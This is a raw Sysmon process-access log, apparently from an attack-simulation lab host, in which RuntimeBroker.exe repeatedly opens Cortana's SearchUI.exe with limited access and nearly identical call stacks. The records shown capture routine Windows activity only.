12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007475Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007474Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007473Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007472Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007471Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007470Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007469Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007468Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007467Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007466Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007465Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007464Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007463Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007462Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007461Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:35.995{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007460Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:35.995{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007459Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:35.995{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007458Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:35.995{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007457Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 